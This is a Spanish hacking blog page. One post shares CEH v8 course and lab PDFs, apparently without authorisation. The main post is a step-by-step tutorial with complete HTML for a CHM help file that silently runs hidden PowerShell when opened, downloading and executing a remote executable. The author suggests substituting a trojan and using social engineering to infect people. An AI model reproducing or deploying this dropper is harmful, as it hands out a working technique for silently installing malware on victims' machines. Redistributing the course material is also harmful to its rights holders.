martes, 7 de julio de 2015

Certified Ethical Hacking V8


Amigos, quiero compartir los PDF del curso Certified Ethical Hacking, incluye los Manuales de Laboratorio y los Módulos de esta prestigiada y deseada Certificación.

Están sin clave, ya que he visto unos que piden usuario y contraseña para autenticarse a un servidor y mostrar recién la información.



Los archivos incluidos dentro del Mega Pack son los siguientes:

CEH v8 Labs Module 00.pdf
CEH v8 Labs Module 02 Footprinting and Reconnaissance.pdf
CEH v8 Labs Module 03 Scanning Networks.pdf
CEH v8 Labs Module 04 Enumeration.pdf
CEH v8 Labs Module 05 System Hacking.pdf
CEH v8 Labs Module 06 Trojans and Backdoors.pdf
CEH v8 Labs Module 07 Viruses and Worms.pdf
CEH v8 Labs Module 08 Sniffers.pdf
CEH v8 Labs Module 09 Social Engineering.pdf
CEH v8 Labs Module 10 Denial of Service.pdf
CEH v8 Labs Module 11 Session Hijacking.pdf
CEH v8 Labs Module 12 Hacking Webservers.pdf
CEH v8 Labs Module 13 Hacking Web Applications.pdf
CEH v8 Labs Module 14 SQL Injection.pdf
CEH v8 Labs Module 15 Hacking Wireless Networks.pdf
CEH v8 Labs Module 17 Evading IDS, Firewalls and Honeypots.pdf
CEH v8 Labs Module 18 Buffer Overflow.pdf
CEH v8 Labs Module 19 Cryptography.pdf

CEHv8 Module 00.pdf
CEHV8 Module 01 Introduction to Ethical Hacking.pdf
CEHv8 Module 02 Footprinting and Reconnaissance.pdf
CEHv8 Module 03 Scanning Networks.pdf
CEHv8 Module 04 Enumeration.pdf
CEHv8 Module 05 System Hacking .pdf
CEHv8 Module 06 Trojans and Backdoors.pdf
CEHv8 Module 07 Viruses and Worms.pdf
CEHv8 Module 08 Sniffing.pdf
CEHv8 Module 09 Social Engineering.pdf
CEHv8 Module 10 Denial of Service.pdf
CEHv8 Module 11 Session Hijacking.pdf
CEHv8 Module 12 Hacking Webservers.pdf
CEHv8 Module 13 Hacking Web Applications .pdf
CEHv8 Module 14 SQL Injection.pdf
CEHv8 Module 15 Hacking Wireless Networks.pdf
CEHv8 Module 16 Hacking Mobile Platforms.pdf
CEHv8 Module 17 Evading IDS, Firewalls, and Honeypots.pdf
CEHv8 Module 18 Buffer Overflow.pdf
CEHv8 Module 19 Cryptography.pdf
CEHv8 Module 20 Penetration Testing.pdf
CEHv8 References.pdf



Hackfu0


Escrito por a las No hay comentarios:
Etiquetas: , , ,

Laboratorios Cisco CCNA Security versión 1.1.

Estos Laboratorios de Cisco son de los que comprueban tus respuestas, a practicar se ha dicho.






Hackfu0
Escrito por a las No hay comentarios:
Etiquetas:

viernes, 3 de julio de 2015

Ejecutar Putty automáticamente al abrir archivo CHM.

Quiero mostrar algo que me pareció interesante y que decidí implementar para hacer algunas bromas a algunos amigos :).

Se trata de que se ejecute una aplicación automáticamente luego de abrir  un archivo de extensión "CHM" (Microsoft Compiled HTML Help), no se quien es el autor de esta idea así que voy a citar a algunas fuentes de donde saque la información.

Como crear un archivo CHM
http://www.elguille.info/hhw/dnm/default.aspx

Run calc.exe via open CHM file
https://twitter.com/ithurricanept/status/534993743196090368

Infection par les fichiers d'aide (.chm)
http://rootsheep.info/2015/03/11/infection-par-les-fichiers-daide-chm/



A continuación mostrare la creación del archivo, lo hice desde una maquina Windows 7:

1.- Primero debemos descargar la aplicación, HTML Help Workshoplo hacemos desde el sitio oficial de Microsoft y la instalamos.


O descargamos desde mi repositorio.


2.- Abrimos HTML Help Workshop.


3.- Creamos un nuevo proyecto y seguimos los siguientes pasos:




Recuerda es con extensión "HHP"


4.- Creamos un archivo HTML con la siguiente información dentro de el:

<HTML>
<TITLE>CHM Prueba de Concepto hackfu0.blogspot.com</TITLE>
<HEAD>
</HEAD>
<BODY>

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=",powershell.exe, -WindowStyle hidden -command (new-object System.Net.WebClient).DownloadFile('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe',$env:temp+'\archivo-hackfu0.exe');start-process $env:temp\archivo-hackfu0.exe">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>

<SCRIPT>
x.Click();
</SCRIPT>

<A name=contents>
<H2 align=center>Download file and run it with chm.</H2>
<P></A>
<H3 ALIGN=CENTER>BY HACKFU0</H3><P>
</BODY>
</HTML>

Explicación: si nos fijamos en lo principal que hará este archivo será descargar el archivo Putty.exe desde la pagina oficial (puede ser cualquier .exe), lo va a guardar en Temporales con otro nombre y luego lo va a ejecutar, todo esto lo hace automáticamente al abrir el archivo CHM, no es necesario hacer clic.

5.- Le indicamos la ruta de nuestro archivo HTML que contiene el texto anterior.



Y terminamos con la creación del archivo.

6.- Luego Compilamos el Proyecto:


7.- Se compila y guarda en la ubicación que le indiquemos, luego vamos y ejecutamos el archivo CHM creado por nosotros:





8.- Finalmente observamos que se ejecuta el Putty de forma automática y que en la carpeta Temporal se crea el archivo que especificamos en la creación del archivo HTML.

Conclusión. Fácilmente podríamos colocar un troyano en vez del Putty e infectar a alguna persona, lamentablemente algunos servidores de correo electrónico no permiten el enviar ni recibir este tipo de extensiones (CHM), pero a través de Ingeniería Social podríamos convencer a alguien de que lo abra a través de un Pendrive o que lo descargue y abra desde algún enlace en la nube, opciones hay muchas la creatividad es tuya.

No me hago responsable del uso que se le de a este tutorial.


Hackfu0












Escrito por a las No hay comentarios:
Etiquetas: , , ,
Suscribirse a: Entradas (Atom)